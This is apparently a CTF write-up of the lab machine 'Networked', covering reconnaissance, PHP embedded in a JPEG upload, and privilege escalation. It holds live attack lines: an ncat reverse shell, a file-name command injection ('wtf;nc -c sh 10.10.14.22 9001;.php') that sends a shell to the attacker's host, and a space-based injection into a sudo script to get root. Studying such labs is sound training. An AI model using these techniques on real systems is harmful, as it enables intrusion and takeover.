We find a backup directory on the web server that allows us to read the source code of the php upload application
We use GNU GIMP to embed php code on the comments of the image properties and upload the JPEG to get command execution and get a reverse shell
Got user guly by exploiting a cron job that executes a php script every 3 minutes
Got root by exploiting a shell script that changes information related to the networking interfaces
Tools Used:
nmap, ffuf, gnu gimp, ncat
Nmap
# Nmap 7.80 scan initiated Mon May 4 12:46:19 2020 as: nmap -sC -sV -p- -oA nmap/allports 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.54s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 4 13:12:58 2020 -- 1 IP address (1 host up) scanned in 1599.45 seconds
Checking the backup directory, we noticed a backup.tar file with the same php files we found using ffuf
-rw-r--r-- 1 kali kali 10240 May 4 12:51 backup.tar
-rw-r--r-- 1 kali kali 229 Jul 9 2019 index.php
-rw-r--r-- 1 kali kali 2001 Jul 2 2019 lib.php
-rw-r--r-- 1 kali kali 1871 Jul 2 2019 photos.php
-rw-r--r-- 1 kali kali 1331 Jul 2 2019 upload.php
Checking The Files Found
Analysis of the upload.php code
Exploit
We tried uploading a php webshell but it failed. However when we uploaded a jpeg, it uploaded it successfully.
Embedding php code on a JPEG
We use GNU GIMP to embed php code on the comments of the image properties.
We get command execution and get a shell using netcat
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49080.
id
uid=48(apache) gid=48(apache) groups=48(apache)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
Privilege Escalation
Getting User Guly
The user flag is under the home directory of guly but we can't read it yet. There are some files we can read. one of them is a crontab that executes the check_attack.php script every 3 minutes.
1) The script uses /var/www/html/uploads and checks all the files
2) It performs a grep like function to avoid files that begin with a . (hidden files)
3) Check files names and extensions and sends an email to if it finds something that is not part of the valid extensions list.
To exploit the php script, we execute the following command to create a file that gets us a shell: touch 'wtf;nc -c sh 10.10.14.22 9001;.php'
This will make the php script execute wtf (which is nothing) then executes the netcat command to connects to our kali box.
# under /var/www/html/uploads
touch 'wtf;nc -c sh 10.10.14.22 9001;.php'
# Got a shell
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49106.
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
Getting Root
# To get root
[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$
# The script
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
We can use spaces to execute multiple commands, For example:
eth0 /bin/bash